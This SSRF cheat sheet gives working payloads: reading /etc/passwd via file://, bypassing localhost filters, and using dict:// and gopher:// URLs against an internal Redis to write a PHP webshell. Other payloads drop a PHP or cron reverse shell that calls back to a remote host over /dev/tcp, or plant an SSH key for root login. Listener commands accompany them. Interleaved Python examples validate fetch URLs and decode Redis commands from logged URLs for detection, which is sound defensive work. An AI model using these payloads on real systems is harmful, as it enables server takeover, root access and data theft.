SERVER SIDE REQUEST FORGERY (SSRF)

https://vinc.top/2016/11/24/server-side-request-forgery
https://github.com/allanlw/svg-cheatsheet

PoC and enumeration

It is possible to prove the vulnerability by reading local files using the file protocol:

url=file:///etc/passwd

Then you can enumerate which local services are listening, inferring each port's state from differences in the response:

http://localhost:

It is also possible to use other protocols such as gopher and dict. They don't wrap the payload in HTTP headers, so the target service receives it as-is instead of misinterpreting an HTTP request:

gopher://127.0.0.1:6379/test

Filter bypass

- http://127.1 instead of http://127.0.0.1
- http://0 instead of http://localhost
- http://0xC0A80001 or http://3232235521 => 192.168.0.1
- http://192.168.516 => 192.168.2.4
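The spellings above all work because the libc address parser (inet_aton) accepts one to four dot-separated parts in decimal, octal or hex, with the last part filling the remaining bytes. As an added example that is not code from the original page, the following Python shows the defensive counterpart for this section and the protocol section above it: it allows only HTTP(S) (so file, gopher and dict are refused), normalises the host with the same permissive rules, and blocks anything that lands on loopback, private, link-local, unspecified or IPv4-mapped-loopback space. The function names are mine, and 8.8.8.8 is used only as a constructed sample of a public address.

```python
"""Validate a user-supplied fetch URL before a server-side request is made.
Added example, not code from the original page; function names are assumed."""
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def parse_legacy_ipv4(host):
    """Parse an IPv4 literal with the permissive rules of BSD/glibc inet_aton():
    one to four dot-separated parts, each decimal, octal (leading 0) or hex (0x),
    with the last part filling every remaining byte. This is why 127.1, 0,
    0xC0A80001, 3232235521 and 192.168.516 are all valid addresses.
    Returns the address as an int, or None if the string is not numeric."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for part in parts:
        if not (part.isascii() and part.isalnum()):   # rejects "", "-1", "1_0", " 1"
            return None
        try:
            if len(part) > 1 and part[0] == "0":
                if part[1] in "xX":
                    values.append(int(part[2:], 16))   # "0x..." hex
                else:
                    values.append(int(part, 8))        # legacy leading-zero octal
            else:
                values.append(int(part, 10))
        except ValueError:
            return None
    if any(not 0 <= v <= 255 for v in values[:-1]):
        return None
    tail_bytes = 4 - (len(values) - 1)                 # bytes the last part covers
    if not 0 <= values[-1] < 256 ** tail_bytes:
        return None
    result = 0
    for v in values[:-1]:
        result = (result << 8) | v
    return (result << (8 * tail_bytes)) | values[-1]


def literal_address(host):
    """Return an ipaddress object when host is an address literal, else None."""
    try:
        return ipaddress.ip_address(host)              # canonical IPv4 / IPv6 text
    except ValueError:
        pass
    n = parse_legacy_ipv4(host)
    return ipaddress.IPv4Address(n) if n is not None else None


def is_public(addr):
    """True only for globally routable unicast space."""
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped                        # ::ffff:127.0.0.1 is still loopback
    return not (addr.is_loopback or addr.is_private or addr.is_link_local
                or addr.is_unspecified or addr.is_multicast or addr.is_reserved)


def check_url(url):
    """Classify a URL as ('block', why), ('allow', canonical address) or
    ('resolve', hostname) when a DNS name still has to be resolved; the caller
    must re-check the resolved address and pin the connection to it."""
    try:
        parts = urlsplit(url)
        host = parts.hostname
    except ValueError:
        return ("block", "unparseable URL")
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return ("block", "scheme %r not allowed" % parts.scheme)
    if not host:
        return ("block", "missing host")
    if host == "localhost" or host.endswith(".localhost"):
        return ("block", "localhost name")
    addr = literal_address(host)
    if addr is None:
        return ("resolve", host)
    if not is_public(addr):
        return ("block", "%s normalises to %s" % (host, addr))
    return ("allow", str(addr))


if __name__ == "__main__":
    for u in ["file:///etc/passwd", "gopher://127.0.0.1:6379/test",
              "http://127.1/", "http://0/", "http://0xC0A80001/",
              "http://3232235521/", "http://192.168.516/",
              "http://169.254.169.254/latest/", "http://8.8.8.8/",
              "http://localhost:8080/"]:
        print(u, "->", check_url(u))
```

The "resolve" verdict is deliberate: a hostname can only be judged after resolution, and the address used for the connection must be the one that was checked, otherwise a DNS answer that changes between check and connect gets past the filter.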

Redis Exploitation

Redis is an in-memory key-value database. It persists its dataset to a file whose directory and name are controlled by CONFIG SET dir and CONFIG SET dbfilename, and SAVE writes that file on demand; the tricks below abuse exactly that to drop a file of the attacker's choosing.

Getting a webshell

url=dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/var/www/html
url=dict://127.0.0.1:6379/CONFIG%20SET%20dbfilename%20file.php
url=dict://127.0.0.1:6379/SET%20mykey%20"<\x3Fphp system($_GET[0])\x3F>"
url=dict://127.0.0.1:6379/SAVE

Getting a reverse shell

gopher://127.0.0.1:6379/_config%20set%20dir%20%2Fvar%2Fwww%2Fhtml
gopher://127.0.0.1:6379/_config%20set%20dbfilename%20reverse.php
gopher://127.0.0.1:6379/_set%20payload%20%22%3C%3Fphp%20shell_exec%28%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FREMOTE_IP%2FREMOTE_PORT%200%3E%261%27%29%3B%3F%3E%22
gopher://127.0.0.1:6379/_save
# start a listener on REMOTE_PORT, then request the written file
nc -lvp
http://site.org/reverse.php

Priv. Esc. using SSH key

# generate a key pair; CLE_PUB_RSA_ICI stands for the public key (id_rsa.pub)
ssh-keygen
url=dict://127.0.0.1:6379/SET%20mykey%20"\n\nCLE_PUB_RSA_ICI\n\n"
url=dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/root/.ssh
url=dict://127.0.0.1:6379/CONFIG%20SET%20dbfilename%20authorized_keys
url=dict://127.0.0.1:6379/SAVE
ssh -i id_rsa root@host.org

You can use the dict protocol and crontab:

- Set the working directory
- Update the redis database location
- Start listening
- Write a reverse shell payload
- Save it

dict://127.0.0.1:6379/config set dir /var/spool/cron/
dict://127.0.0.1:6379/config set dbfilename root
nc -lvp
dict://127.0.0.1:6379/set -.- "\n\n\n* * * * * bash -i >\x26 /dev/tcp/"ip"/"port" 0>\x261\n\n\n"
dict://127.0.0.1:6379/save

You can also use the gopher protocol (replace IP and port)

url=gopher%3A//127.0.0.1%3A6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252462%250D%250A%250A%250A%252A/
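For anyone reviewing logs or writing detection rules, the interesting part of these URLs is the Redis traffic buried inside them: the gopher form is double percent-encoded RESP (`*N` arrays of `$len` bulk strings), the dict form is plain inline text. As an added example that is not code from the original page, the following Python decodes either form back into the Redis commands it would deliver and flags the ones that change what Redis writes to disk. The CONFIG SET dir /tmp sample is constructed; DICT_SAMPLE and PAGE_SAMPLE are the page's own payloads, the latter kept truncated exactly as the page has it to show how a cut-off bulk string is reported. Function names are mine.

```python
"""Decode the Redis commands carried by a gopher:// or dict:// SSRF URL.
Added example, not code from the original page; function names are assumed."""
from urllib.parse import unquote

# Commands that change what Redis persists or where; any of these arriving
# over an SSRF channel is the signature of the RDB-file trick described above.
SENSITIVE = {"CONFIG", "SAVE", "BGSAVE", "FLUSHALL", "SLAVEOF", "REPLICAOF",
             "DEBUG", "MODULE", "EVAL"}


def fully_unquote(s, limit=5):
    """Percent-decode until stable: the gopher form is double-encoded so the
    first decode (done by the vulnerable app) still leaves the CRLFs escaped."""
    for _ in range(limit):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def parse_resp(data):
    """Parse consecutive RESP arrays ('*N' then N '$len' bulk strings) into a
    list of argv lists. A bulk string cut off by truncation is kept with a
    '<truncated>' marker rather than silently dropped."""
    commands, pos = [], 0
    while pos < len(data) and data[pos] == "*":
        end = data.find("\r\n", pos)
        if end < 0:
            break
        try:
            argc = int(data[pos + 1:end])
        except ValueError:
            break
        pos, args = end + 2, []
        for _ in range(argc):
            end = data.find("\r\n", pos)
            if pos >= len(data) or data[pos] != "$" or end < 0:
                return commands + ([args] if args else [])
            try:
                length = int(data[pos + 1:end])
            except ValueError:
                return commands + ([args] if args else [])
            start = end + 2
            if start + length > len(data):            # payload ends mid-string
                args.append(data[start:] + "<truncated>")
                return commands + [args]
            args.append(data[start:start + length])
            pos = start + length + 2
        commands.append(args)
    return commands


def extract_redis_commands(url):
    """Return the argv lists a gopher:// or dict:// URL would deliver to Redis.
    Other schemes yield []. A gopher path is '/' plus a one-character item
    type (the '_' in the payloads) plus the raw bytes; a dict path is sent as
    inline text, which Redis also accepts one command per line."""
    decoded = fully_unquote(url)
    scheme, sep, rest = decoded.partition("://")
    if not sep or scheme.lower() not in ("gopher", "dict"):
        return []
    _hostport, _, path = rest.partition("/")
    if scheme.lower() == "gopher":
        path = path[1:]                               # drop the gopher item-type byte
    if path.startswith("*"):
        return parse_resp(path)                       # RESP multibulk form
    return [line.split() for line in path.splitlines() if line.strip()]


def analyse(url):
    """Summarise a logged URL value: decoded commands and the sensitive ones."""
    commands = extract_redis_commands(url)
    flagged = sorted({c[0].upper() for c in commands if c and c[0].upper() in SENSITIVE})
    return {"commands": commands, "sensitive": flagged}


# Constructed sample: double-encoded RESP for CONFIG SET dir /tmp
GOPHER_SAMPLE = ("gopher%3A//127.0.0.1%3A6379/_%252A4%250D%250A%25246%250D%250ACONFIG"
                 "%250D%250A%25243%250D%250ASET%250D%250A%25243%250D%250Adir"
                 "%250D%250A%25244%250D%250A/tmp%250D%250A")
# The page's own dict:// payload and its (truncated) gopher payload
DICT_SAMPLE = "dict://127.0.0.1:6379/CONFIG%20SET%20dbfilename%20file.php"
PAGE_SAMPLE = ("gopher%3A//127.0.0.1%3A6379/_%252A1%250D%250A%25248%250D%250Aflushall"
               "%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1"
               "%250D%250A%252462%250D%250A%250A%250A%252A/")

if __name__ == "__main__":
    for sample in (GOPHER_SAMPLE, DICT_SAMPLE, PAGE_SAMPLE, "http://localhost:8080/"):
        print(analyse(sample))
```

Matching on the decoded command rather than on the encoded URL is the point: the same CONFIG SET can be spelled with different encodings, casing and protocols, while the decoded argv is stable, so a rule written against `analyse()` output (or a WAF doing the same decoding) is much harder to sidestep than a substring match on `%25243`.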
